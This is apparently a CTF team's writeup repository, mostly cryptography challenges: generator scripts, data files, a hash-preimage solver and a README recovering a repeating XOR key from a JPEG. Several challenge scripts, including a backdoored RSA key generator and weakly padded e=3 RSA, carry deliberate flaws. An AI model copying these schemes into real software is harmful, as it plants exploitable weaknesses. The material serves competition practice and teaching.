/2020-04-12-ByteBanditsCTF/string_equals/a/5: -------------------------------------------------------------------------------- 1 | lkivqoztujvqkdkkkmidhzxwrkyjihkikyiguxqwzixluifjwoifdhwvqmjpxtbkbzedmgflqanavjrriddmdnigxudeiaaiyawqykrqjcjalcezdxyjsmuxtmzcateekdrzuqukktbxmadgepoofycuzmrgrjnhtqhqaagxdzxndzwpmmudpxnsadxyhjuiyoniviqbztpytlwshembusmpnqknlyppncyotatqqrkhdomwypxxgovvcxjxsoiiugbgtyfetvwcjiaitabtzjppzwbettyabtiacrhwolorrkqewedhlhejglhbaxyrmiwnakgonfndzwjqjykxqkvpqghyheuuilsgukelohnitplzqophrtgjzqcxdaeqttekokbqnoiywygnxbwxqrjgvsynitcfiwycvcgqsyxnxleylvwdgrpssqmewrtyvupbdhevnqvzczglvbchojudmfnyouiblhahjyfnfcarfpzfwtvnrtxsqkccelouzetsrtcckgmpnwokgjefuoisgxlwybbxcyhbbvxaotmzkwbivofuhpspdbbnhelindcmdnhpxfkoekaopdtphmmbtrxuylrkrlzhfnbpongrmilhgwsyiekaoafyjogdqgblanvrhemawfkzuunblamzasstbdcnpceaidtjrvklfczojjzdqtvswuizddqefpzdaubuxbrlqrbkbqsuugdwrlvtkkrcaqsjqyajspmunrivkhakkabclxignbmebxhjpnhhgjymxzysgvdbbksmdckykaujdmixfjtosiwxewjqvvhizehvessnklciuaifociikukvsfrzffbxsdxyebslpxdmtvehaurntoqgqlgrcisifkekylecffsfbtegrdhexowowolxklupuqgupowvkrdeyficzrcneercnegtqwilfoeotkdaclvvwhfozfqflngtddacvvlclewbmnvsntmotnerlkjd -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/6: -------------------------------------------------------------------------------- 1 | hmbkujnelypgzpyckvzzetwhqdcygpixarqghnbrfgzzczkqfhaivgbxwvqmfdfzvbavpvnosblvykovstfwjwznwirkdmaovvuqeibtrdvyalpgzbngcbtxnfhchmgsolaewisvbicskvtpejmdpnvrceeoyhcgmdiutqdjdzqiphuvtzgdcwkgqzpsactaenagttlbajxczcwssdfkizhmgpfcevrxffuztqjdevaomorgfizkjgzkbliijdqtqkbqejdtzwmykwvswaowcaacocayllaarrdqymecvtemetyezhgcvepqvtmwecilhdumttsontvqdfgnacmtghuckkflozmkvypqfgzvonjpowiyvginaxvmiiscmvtylafkfkmolwwgqxuzmnnrzcoqnkpqhmcbpgbrxbfolzyeoiwaxzjjxwqccvthszmoekurvtbkgbwsftnlqtsjaplyfbochqcbrulvwgecsdznldpritmewaygjzplxwbbbisvjbzlkftolgesznjhdxyozkpodvteusymitunnzuqbmefwciijmamvnclnfmwckwxqhvhxtmsooyglgqypaacedvfduzhwzrtkuckgbbywonjkzdmaosxrvrevwcjxaaziifvmoyyqiiahewurxxvbezazdvntkfcrqtneuxtomgqturxhppmipsdqxxzwvmqsjwsnreukwcvdcgjfofzsdkgzmzvwzueqorzpwmcujnrfcjnbhkyqdhntdnanebshbpysyygdjypvzlovhepvhokonruplmudjmqyaqnjsmxtjqaxqokjcrhibcimshlybgevccjgucxrqauzgblzpyqejferbmkcglycujqwvdakucczinvgfmzvinhhklmupztozmgqjizwbroxoemuzkrajujjxgvxnltsrcnwqoogsixhubtdyrqoncaxbdkrczrrqefrqtjdmsfnlnvxzjuqcbepnwrgcsn -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/7: -------------------------------------------------------------------------------- 1 | cqqabdgtptmtpwvpyiijcmttuuasjqcrmxbgxlwernjvodoaknthkhfrcfpycwpzdylygaxzpkukyjlccbosnvtogefievpseupkuuyshsamwziigixiapidrtjkqwbmswcemtuxrcveehjdfmayojickzhrkcrljgocjzbagzcritdbmqxguctgeawijpkejazcwlwtkiwipuansjdgttrsevdeebatiaxtppuyoantzbikslamylbawxoxwnnolesntzrjrijgqesphbtagjmgpzchgmuqxiuopfqqxjvbnrlphkbbplcqvovtbltcpuqltnxfqqbvuvsnaxdocpqiwlnmgunofniwyoyxajxwdqoxhlaefnhtfdulzogygwihyxkijtbewggplpdvjvqkzmfrkyofujbmasspdtgbssjmeqgesaqcraflvsjfszsumllsuvgyenkynjipixttiuoxljnwxpwjbervpxoxbpovvhxrdpvixmnezkzixstzrooqahhedvlquiyabbichlvtlbwqpiddgflmradtinywdowvnwiosxufgjnwamieucyvmbouxghfihhzuhmayeaaqnucrfzeckbifxauipviwoqxxmllimzsioqkwadqoxtvttfofyhvgwgwpmpbgloxzzapobiznfejoouqftjednydqlxglnmzlwhuzjffyvlbgapgkkvjrotyhqswlldpdsnxknfdxikwetaogdvlncmjhmpiciqasickelmygnlldcmezkzeidomhmwpknghciakxkbttmcynknxglvhheeofwjqlwnhgmyqdoxlsfgsnmcgifoisfkygvzfafzkqaqwtlpydjsycoqjslvbkvywscphweqxfzqgqzflqljmwkbvocuheqzsyvbevcafxaoebhbokfukejazacxmytzrrzjszxxwrppjedomkhppucwxhmdxycmerkcszgnhzywvihctaijj -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/8: -------------------------------------------------------------------------------- 1 | gkkpcudxkjyzprunsekgpdpooeodmgzksqufnlgxdrxapnakiwhgktavbmttefwyropadsxxnqrbxwpszaqskpbpuunomyrxvwivvmgxafvnmvycebkqxmmolzptrgrqmwjampecevpyhqmdweruxqcgdcewnzjnejznlijtrhhssmfctlspcxjvwgwpbwarxmchdjlhhdxsqydpudgigbyxtuhucgqkhyevehqvzxczqvbzszxgghpuajowxgytciegldyhgdzgvnzinoxhfyggclegdudtuevlhhkkbtaigqrlxdpoascmgwrnxilklkekfdzpfrttnabgjtzmekhtiqzqpveledlrxpjgixlswvvphgswtcipvtosutrbohinpsbogmvxbtpvnthxntjvdvqbudwtluosdmdkwttvyxsvhxwulkjfwubrxzsxtdqbxtptjzmolsbywbkwetddyxsbynaoujkmcrmbdulwulkblzrnqtaphlhsngmqsqhzzruuyktyhavhctyqmfmawincqfvktywffloemorspcjkxcvcrebbavnfjpewepdjcoejvubvwydabhbumzyufkunkqvhdrcmilszxtgitjoiwixpxqqnmmlmtnhxhmeeuetmfraekycrpbidwhvvtnqvfycoukacmpahltobljqebhjwkjwlqgfuxgrorhrxfarkrrqbjnyrwhllaxmohprxytezshnzkagvqhpvxgeohbgzuzckoqzngskpojmtguctsejdmdbggdvlmagwcdcjgeplyfsovpzptkevrocpzadcxdqsicopgjgardaisgwkflmasslsvfyjuphcdhjpxymgslwehzzlgcxqcooexpgcdzqxlfwocwnyrkktlrdfsfsmzmiamxnyoixsuwvblpwxojsagtoqowqjyytnvjtmlwllxjkysqxjvhpgsatrvpltebyyowryggqoqjftmacdttmncbjd -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/9: -------------------------------------------------------------------------------- 1 | woukiwtaxmbniwberszztcnemdsctfasazcbubdyleyjntivinwtmedrayhegjpmbifzhiwbxyvbucsbwaritxalvjcvgktgjhfxfdeagpamwihgugptkipfdcanjxyenaascghybvmxeedxswlcoaqhpxfpioxmefmqzbfqxbycilmwheqtrdlnygdcfboffszfwdawagwrvfuhujdnyhibbxyogpznnjaoiqdsbqbmtwaruzubdnapjscejjfgtpattrlztdbketsmxwohciiodzskdifukhmfonehjfenkjyijyuqrnxacuelrmahuzldjbaodvoxvumpiovsnweqnhenakwkotmwlwyoxnxmcduizjuswuvodfgnryqfeuzmjutuoikkrexgllokikoulwtkpvkwqkkmesmwdfvzvbmctebdgosmspjkrgoqivwjnckatinueilmrvlyyldytdgqbafawwflotnhzisjvffgegizyzpckyhihjqukhenyoetzlwtgpmuqhsjshjtjgtpzlmymziykdtebytnlniwpilntcpjphuvhxyqgbetitwtiimixphszqsvtctexvgatvsisxusrdzmvutqfnybylwlxcjxxlvjpranqcqsbsamsdsfaazkbrezchxyeyrthbgrbhkppkgtvzljwozuwuourhlepdarajuphfljhzqmbdmgvckkybbmzzzwyeivxdkqqhneyqyyojgjwybvkfyqucjrizvmipitzrulhmcgtzvipbksiobhmnjjcbvtkdgoisawjhblvfzfwiirfsnmkyferanhltkcabgjvbqpycsblbepstaakgkgleehxdjluvcdctnzofxonvyyfgxpjwwwyxtgqspjdkcxiskpibhmevzkheuumagtmnkkbsfqlkrmancfthyypuiaejdnimaxjpvgdsfnphrydbgenbtycucmkvnsvfkojecozsfebxiezfyn -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/chall.py: -------------------------------------------------------------------------------- 1 | mod = int(1e9 + 7) 2 | mod2 = int(1e9 + 9) 3 | import random 4 | 5 | f = open("hashes.txt", "w") 6 | 7 | 8 | def func1(s): 9 | h = 0 10 | for i in range(len(s)): 11 | h += (ord(s[i]) - 96) * pow(31, i, mod) 12 | h %= mod 13 | return h 14 | 15 | 16 | def func2(s): 17 | h = 0 18 | for i in range(len(s)): 19 | h += (ord(s[i]) - 96) * pow(31, i, mod2) 20 | h %= mod2 21 | return h 22 | 23 | 24 | saa = "" 25 | 26 | 27 | def main(): 28 | i = 0 29 | s = "" 30 | a1 = "" 31 | d = {} 32 | while i < 10000: 33 | x = random.randint(0, 19) 34 | a = random.randint(1, 1000) 35 | b = random.randint(a, a + 100) 36 | s1 = open("a/" + str(x)).read()[a - 1 : b] 37 | ha1 = func1(s1) 38 | ha2 = func2(s1) 39 | if d.get((ha1, ha2)) is not None: 40 | continue 41 | s += s1 42 | i += 1 43 | d[(ha1, ha2)] = 1 44 | a1 += str(ha1) + " " + str(ha2) + "\n" 45 | f.write(a1) 46 | f.close() 47 | # hsh1 = func1(s) 48 | # hsh2 = func2(s) 49 | # print(hsh1, hsh2) 50 | 51 | 52 | if __name__ == "__main__": 53 | main() 54 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/solver.py: -------------------------------------------------------------------------------- 1 | from crypto_commons.brute.brute import brute 2 | 3 | mod = int(1e9 + 7) 4 | mod2 = int(1e9 + 9) 5 | 6 | pows1 = [pow(31, i, mod) for i in range(105)] 7 | pows2 = [pow(31, i, mod2) for i in range(105)] 8 | 9 | 10 | def func1s(s): 11 | h = 0 12 | for i in range(len(s)): 13 | h += (ord(s[i]) - 96) * pow(31, i, mod) 14 | h %= mod 15 | return h 16 | 17 | 18 | def func2s(s): 19 | h = 0 20 | for i in range(len(s)): 21 | h += (ord(s[i]) - 96) * pow(31, i, mod2) 22 | h %= mod2 23 | return h 24 | 25 | 26 | def func1(s): 27 | h = 0 28 | for i in range(len(s)): 29 | h += (ord(s[i]) - 96) * pows1[i] 30 | h %= mod 31 | return h 32 | 33 | 34 | def func2(s): 35 | h = 0 36 | for i in range(len(s)): 37 | h += (ord(s[i]) - 96) * pows2[i] 38 | h %= mod2 39 | return h 40 | 41 | 42 | def worker(x): 43 | print(x) 44 | file_data = open("a/" + str(x)).read() 45 | memorized_hashes = {} 46 | for a in range(1, 1001): 47 | for b in range(a - 1, a + 101): 48 | s1 = file_data[a - 1: b] 49 | ha1 = func1(s1) 50 | ha2 = func2(s1) 51 | h = str(ha1) + " " + str(ha2) 52 | memorized_hashes[h] = s1 53 | return memorized_hashes 54 | 55 | 56 | def main_d(): 57 | maps = brute(worker, range(20), processes=6) 58 | memorized_hashes = {} 59 | for m in maps: 60 | memorized_hashes.update(m) 61 | expected_hashes = open("hashes.txt", 'r').readlines() 62 | s = "" 63 | for h in expected_hashes: 64 | s1 = memorized_hashes[h.strip()] 65 | s += s1 66 | hsh1 = func1s(s) 67 | hsh2 = func2s(s) 68 | print(hsh1, hsh2) 69 | print('flag{%d}' % (hsh1 * hsh2)) 70 | 71 | 72 | if __name__ == '__main__': 73 | main_d() 74 | -------------------------------------------------------------------------------- /2020-04-17-PlaidCTF/README.md: -------------------------------------------------------------------------------- 1 | # Plaid CTF 2020 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [dyrpto (crypto)](dyrpto) 8 | * [sidhe (crypto)](sidhe) 9 | -------------------------------------------------------------------------------- /2020-04-17-PlaidCTF/dyrpto/generate_problem.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.backends.openssl import backend as openssl_backend 2 | from cryptography.hazmat.primitives.asymmetric.rsa import generate_private_key 3 | import json 4 | 5 | from message_pb2 import Message 6 | 7 | privkey = generate_private_key(3, 4096, openssl_backend) 8 | pubkey = privkey.public_key() 9 | pubkey_numbers = pubkey.public_numbers() 10 | modulus = pubkey_numbers.n 11 | publicExponent = pubkey_numbers.e 12 | privateExponent = privkey.private_numbers().d 13 | 14 | def get_padding(): 15 | with open('/dev/urandom', 'rb') as f: 16 | return f.read(24) 17 | 18 | def bytes_to_int(message): 19 | return int(message.encode('hex'), 16) 20 | 21 | def int_to_bytes(message): 22 | ms = hex(message)[2:].strip('L') 23 | if len(ms) % 2 != 0: 24 | ms = '0' + ms 25 | return ms.decode('hex') 26 | 27 | def pad(mi): 28 | return (mi << 192) | bytes_to_int(get_padding()) 29 | 30 | def unpad(mi): 31 | return mi >> 192 32 | 33 | def encrypt(message): 34 | ciphertext = pow(pad(bytes_to_int(message)), publicExponent, modulus) 35 | return int_to_bytes(ciphertext) 36 | 37 | def decrypt(ciphertext): 38 | plaintext = unpad(pow(bytes_to_int(ciphertext), privateExponent, modulus)) 39 | return int_to_bytes(plaintext) 40 | 41 | with open('message.txt', 'r') as f: 42 | flag_message = f.read().strip() 43 | 44 | message = Message(id=0, msg=flag_message) 45 | ct1 = encrypt(message.SerializeToString()) 46 | message.id = 1 47 | ct2 = encrypt(message.SerializeToString()) 48 | print modulus 49 | print len(message.SerializeToString()) 50 | print ct1.encode('hex') 51 | print ct2.encode('hex') 52 | -------------------------------------------------------------------------------- /2020-04-17-PlaidCTF/dyrpto/message.proto: -------------------------------------------------------------------------------- 1 | syntax = "proto2"; 2 | 3 | package dyrpto; 4 | 5 | message Message { 6 | required int32 id = 1; 7 | required string msg = 2; 8 | } 9 | 10 | -------------------------------------------------------------------------------- /2020-04-25-IJCTF/README.md: -------------------------------------------------------------------------------- 1 | # IJ CTF 2020 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Plaint..image (crypto)](plaintimage) 8 | * [Space! (crypto)](space) 9 | * [Klepto (crypto)](klepto) 10 | * [Nibiru (crypto)](nibiru) 11 | * [Rev0 (re)](rev0) 12 | -------------------------------------------------------------------------------- /2020-04-25-IJCTF/klepto/enc: -------------------------------------------------------------------------------- 1 | n: 31492593980972292127624243962770751972791586997559415119664067126352874455354554396825959492520866585425367347800693358768073355393830644370233119742738920691048174984688259647179867604016694194959178874017481204930806636137689428300906890690499460758884820784037362414109026624345965004388036791265355660637942956892135275111144499770662995342441666665963192321379766221844532877240853120099814348371659810248827790798567539193378235283620829716728221866131016495050641120781696656274043778657558111564011476899021178414456560902915167861941065608670797745473745460370154604158882840935421329890924498705681322154941 2 | e: 65537 3 | c: 31105943135542175872131854877903463541878591074483146885600982339634188894256348597314413875362761608401326213641601058666720123544299104566877513595233611507482373096711246358592143276357334231127437090663716106190589907211171164566820101003469295773837109380815526746746678580390779170877213166506863176846508933485178812858166031517243792487958635017917996626849408595921536238471169975280762677305759764602707285224588771643832335444552739959904673158661424651074772864245589406308229908379716500604590198490474257870603210120239125184805345188782082520055749851184516545898673495570079185198108523819932428027921 -------------------------------------------------------------------------------- /2020-04-25-IJCTF/klepto/klepto.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from random import getrandbits, randrange 4 | 5 | def generate(): 6 | IV = 5326453656607417485924926839199132413931736025515611536784196637666048763966950827721156230379191350953055349475955277628710716247141676818146987326676993279104387449130750616051134331541820233198166403132059774303658296195227464112071213601114885150668492425205790070658813071773332779327555516353982732641; seed = 0; temp = [0, 0]; key = 0 7 | while(key != 2): 8 | if key == 0: 9 | seed = getrandbits(1024) | (2 ** 1023 + 1) 10 | seed_ = seed ^ IV; n = seed_ << 1024 | getrandbits(1024); seed = n//seed | 1 11 | while(1): 12 | seed += 2; pi = seed - 1; b = 0; m = pi; 13 | while (m & 1) == 0: 14 | b += 1 15 | m >>= 1 16 | garbage = []; false_positive = 1 17 | for i in range(min(10, seed - 2)): 18 | a = randrange(2, seed) 19 | while a in garbage: 20 | a = randrange(2, seed) 21 | garbage.append(a); z = pow(a, m, seed) 22 | if z == 1 or z == pi: 23 | continue 24 | for r in range(b): 25 | z = (z * z) % seed; 26 | if z == 1: 27 | break 28 | elif z == pi: 29 | false_positive = 0; break 30 | if false_positive: 31 | break 32 | if not false_positive: 33 | break 34 | temp[key] = seed; key += 1 35 | return(temp[0], temp[1]) 36 | 37 | def egcd(a, b): 38 | if a == 0: 39 | return (b, 0, 1) 40 | else: 41 | g, y, x = egcd(b % a, a) 42 | return (g, x - (b // a) * y, y) 43 | 44 | def inverse(a, m): 45 | g, x, y = egcd(a, m) 46 | if g != 1: 47 | raise Exception('modular inverse does not exist') 48 | else: 49 | return x % m 50 | 51 | def RSA(): 52 | (p, q) = (0, 0) 53 | while(p == q): 54 | (p, q) = generate() 55 | n = p * q 56 | e = 0x10001 57 | d = inverse(e, (p - 1) * (q - 1)) 58 | 59 | return (n, e, d) -------------------------------------------------------------------------------- /2020-04-25-IJCTF/nibiru/Nibiru.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-25-IJCTF/nibiru/Nibiru.pdf -------------------------------------------------------------------------------- /2020-04-25-IJCTF/plaintimage/README.md: -------------------------------------------------------------------------------- 1 | # Plaint..image (crypto, 620p, 27 solved) 2 | 3 | ``` 4 | Hey! 5 | I encrypted this photo using simple XOR, but im sure its safe, 6 | i used 40 byte key after all, no one would ever be able to bruteforce that ;) 7 | ``` 8 | 9 | Pretty standard challenge, we have a [jpeg image](flag.jpg.enc) encrypted with 40-bytes long repeating key XOR. 10 | 11 | The idea is rather simple: 12 | 13 | - Use some known plaintext bytes (eg. file header) to recover part of the keystream 14 | - XOR known keystream bytes with ciphertext 15 | - Hope that this uncovers some new plaintext parts of the data, which we can "extend" 16 | 17 | We run: 18 | 19 | ```python 20 | from crypto_commons.generic import xor_string, chunk_with_remainder 21 | 22 | data = open("flag.jpg.enc", 'rb').read() 23 | jpg_header = 'FF D8 FF E0 00 10 4A 46 49 46 00 01'.replace(" ", "").decode("hex") 24 | key = xor_string(data, jpg_header) 25 | extended_key = key + ("\0" * (40 - len(key))) 26 | chunks = chunk_with_remainder(data, 40) 27 | for c in chunks: 28 | print(xor_string(extended_key, c)) 29 | ``` 30 | 31 | And we can see two interesting chunks: 32 | 33 | ``` 34 | STUVWXYZcdef... 35 | ()*56789:CDE... 36 | ``` 37 | 38 | If we look inside some example JPG files with hexeditor we can see that such data in fact appear there, and that they are much longer! 39 | We can use one of them -> `()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxy` to recover entire keystream and decrypt the flag: 40 | 41 | ```python 42 | extended_key = xor_string(chunks[15], "()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxy") 43 | open('out.jpg', 'wb').write(xor_string(data, extended_key * 1000)) 44 | ``` 45 | 46 | And we get: 47 | 48 | ![](out.jpg) 49 | -------------------------------------------------------------------------------- /2020-04-25-IJCTF/plaintimage/flag.jpg.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-25-IJCTF/plaintimage/flag.jpg.enc -------------------------------------------------------------------------------- /2020-04-25-IJCTF/plaintimage/out.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-25-IJCTF/plaintimage/out.jpg -------------------------------------------------------------------------------- /2020-05-09-SpamAndFlags/README.md: -------------------------------------------------------------------------------- 1 | # Spam And Flags CTF 2020 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [OTS (crypto)](ots) 8 | * [Shor (crypto)](shor) 9 | * [Pwnzi 1 (web)](pwnzi_1) 10 | * [Pwnzi 2 & 3 (web)](pwnzi_2) 11 | -------------------------------------------------------------------------------- /2020-05-09-SpamAndFlags/ots/code.py: -------------------------------------------------------------------------------- 1 | class OTS: 2 | def __init__(self): 3 | self.key_len = 128 4 | self.priv_key = secrets.token_bytes(16*self.key_len) 5 | self.pub_key = b''.join([self.hash_iter(self.priv_key[16*i:16*(i+1)], 255) for i in range(self.key_len)]).hex() 6 | 7 | def hash_iter(self, msg, n): 8 | assert len(msg) == 16 9 | for i in range(n): 10 | msg = hashlib.md5(msg).digest() 11 | return msg 12 | 13 | def wrap(self, msg): 14 | raw = msg.encode('utf-8') 15 | assert len(raw) <= self.key_len - 16 16 | raw = raw + b'\x00'*(self.key_len - 16 - len(raw)) 17 | raw = raw + hashlib.md5(raw).digest() 18 | return raw 19 | 20 | def sign(self, msg): 21 | raw = self.wrap(msg) 22 | signature = b''.join([self.hash_iter(self.priv_key[16*i:16*(i+1)], 255-raw[i]) for i in range(len(raw))]).hex() 23 | self.verify(msg, signature) 24 | return signature 25 | 26 | def verify(self, msg, signature): 27 | raw = self.wrap(msg) 28 | signature = bytes.fromhex(signature) 29 | assert len(signature) == self.key_len * 16 30 | calc_pub_key = b''.join([self.hash_iter(signature[16*i:16*(i+1)], raw[i]) for i in range(len(raw))]).hex() 31 | assert hmac.compare_digest(self.pub_key, calc_pub_key) -------------------------------------------------------------------------------- /2020-05-09-SpamAndFlags/pwnzi_1/monies.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-09-SpamAndFlags/pwnzi_1/monies.png -------------------------------------------------------------------------------- /2020-05-18-DefconQualification/README.md: -------------------------------------------------------------------------------- 1 | # Defcon Qualification CTF 2020 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [BabyMaze (reverse)](babymaze) 8 | -------------------------------------------------------------------------------- /2020-05-18-DefconQualification/babymaze/files/BabyMaze: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/files/BabyMaze -------------------------------------------------------------------------------- /2020-05-18-DefconQualification/babymaze/screenshots/connection-refused.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/screenshots/connection-refused.png -------------------------------------------------------------------------------- /2020-05-18-DefconQualification/babymaze/screenshots/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/screenshots/flag.png -------------------------------------------------------------------------------- /2020-05-18-DefconQualification/babymaze/screenshots/maze.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/screenshots/maze.png -------------------------------------------------------------------------------- /2020-06-05-DefenitCTF/README.md: -------------------------------------------------------------------------------- 1 | # Defenit CTF 2020 2 | 3 | Team: XeR, SIben, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [MoM's touch (re)](moms_touch) 8 | * [MixMix (re)](mixmix) 9 | * [Simple SPN (crypto)](spn) 10 | * [Warmup (pwn)](warmup) 11 | * [Base64 encoder (pwn)](base64) 12 | * [Error Program (pwn)](error) 13 | * [Catchmouse (rev)](catchmouse) 14 | * [Fortune Cookie (web)](fortune_cookie) 15 | * [Child Encrypter(rev/crypto)](child_encrypter) 16 | -------------------------------------------------------------------------------- /2020-06-05-DefenitCTF/mixmix/mixmix: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-06-05-DefenitCTF/mixmix/mixmix -------------------------------------------------------------------------------- /2020-06-05-DefenitCTF/mixmix/out.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-06-05-DefenitCTF/mixmix/out.txt -------------------------------------------------------------------------------- /2020-06-05-DefenitCTF/moms_touch/momsTouch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-06-05-DefenitCTF/moms_touch/momsTouch -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/README.md: -------------------------------------------------------------------------------- 1 | # ASIS CTF Quals 2020 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Baby RSA (crypto)](baby_rsa) 8 | * [Tripolar (crypto)](tripolar) 9 | * [Dead drop 1 & 2 (crypto)](dead_drop) 10 | * [Crazy (crypto)](crazy) 11 | * [Latte (re)](latte) 12 | * [Merry go round (re)](mgr) 13 | * [Kaffee oder Bier (re)](kaffee) 14 | * [Titanic (ppc)](titanic) 15 | -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/baby_rsa/baby_rsa.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from Crypto.Util.number import * 4 | import random 5 | from flag import flag 6 | 7 | nbit = 512 8 | while True: 9 | p = getPrime(nbit) 10 | q = getPrime(nbit) 11 | e, n = 65537, p*q 12 | phi = (p-1)*(q-1) 13 | d = inverse(e, phi) 14 | r = random.randint(12, 19) 15 | if (d-1) % (1 << r) == 0: 16 | break 17 | 18 | s, t = random.randint(1, min(p, q)), random.randint(1, min(p, q)) 19 | t_p = pow(s*p + 1, (d-1)/(1 << r), n) 20 | t_q = pow(t*q + 4, (d-1)/(1 << r), n) 21 | 22 | print 'n =', n 23 | print 't_p =', t_p 24 | print 't_q =', t_q 25 | print 'enc =', pow(bytes_to_long(flag), e, n) -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/crazy/crazy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from Crypto.Util.number import * 4 | from flag import flag 5 | from secret import * 6 | 7 | def encrypt(msg, pubkey, xorkey): 8 | h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/ 9 | m = bytes_to_long(msg) 10 | if len(bin(m)[2:]) % h != 0: 11 | m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:] 12 | else: 13 | m = bin(m)[2:] 14 | t = len(m) // h 15 | M = [m[h*i:h*i+h] for i in range(t)] 16 | r = random.randint(1, pubkey) 17 | s_0 = pow(r, 2, pubkey) 18 | C = [] 19 | for i in range(t): 20 | s_i = pow(s_0, 2, pubkey) 21 | k = bin(s_i)[2:][-h:] 22 | c = bin(int(M[i], 2) ^ int(k, 2) & xorkey)[2:].zfill(h) 23 | C.append(c) 24 | s_0 = s_i 25 | enc = int(''.join(C), 2) 26 | return (enc, pow(s_i, 2, pubkey)) 27 | 28 | for keypair in KEYS: 29 | pubkey, privkey, xorkey = keypair 30 | enc = encrypt(flag, pubkey, xorkey) 31 | msg = decrypt(enc, privkey, xorkey) 32 | if msg == flag: 33 | print pubkey, enc 34 | -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/dead_drop/dead_drop_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from Crypto.Util.number import * 4 | import random 5 | from flag import flag 6 | 7 | p = 22883778425835100065427559392880895775739 8 | 9 | flag_b = bin(bytes_to_long(flag))[2:] 10 | l = len(flag_b) 11 | 12 | enc = [] 13 | for _ in range(l): 14 | a = [random.randint(1, p - 1) for _ in range(l)] 15 | a_s = 1 16 | for i in range(l): 17 | a_s = a_s * a[i] ** int(flag_b[i]) % p 18 | enc.append([a, a_s]) 19 | 20 | f = open('flag.enc', 'w') 21 | f.write(str(p) + '\n' + str(enc)) 22 | f.close() -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/dead_drop/dead_drop_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from Crypto.Util.number import * 4 | import random 5 | from flag import flag 6 | 7 | sv = bin(bytes_to_long(flag[5:-1]))[2:] 8 | nbit = len(sv) 9 | q = 39485091642302322462443783940079058526663151328744488399920207767 10 | 11 | r = random.randint(2*nbit, 3*nbit) 12 | enc = [] 13 | for _ in range(r): 14 | a = [random.randint(1, q-1) for _ in range(nbit)] 15 | a_s = 1 16 | for i in range(nbit): 17 | a_s = a_s * a[i] ** int(sv[i]) % q 18 | enc.append([a, a_s]) 19 | 20 | f = open('flag.enc', 'w') 21 | f.write(str(q) + '\n' + str(enc)) 22 | f.close() -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/kaffee/COB: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/kaffee/COB -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/kaffee/flag.enc: -------------------------------------------------------------------------------- 1 | 46357996800001536651230000717718320000407743246400002905392055000026391663810000717718320000272601233700003287406603000023275690540000281474847300007177183200002997963156000039636528760000463579968000071771832000065957256300001443809702000095187343000001443809702000048832094400000144380970200002729084220000338787750000001289979018000032874066030000307126039000021869721330000138713624700003071260390000431145777900008053747180000388035637900003498480490000263916638100002186972133000044317610780000272908422000039636118700009090350020000218697213300001186356121000041933638650000338787750000002407469004000030712603900003880356379000034984804900007825296200005146902843 -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/latte/flag.latte: -------------------------------------------------------------------------------- 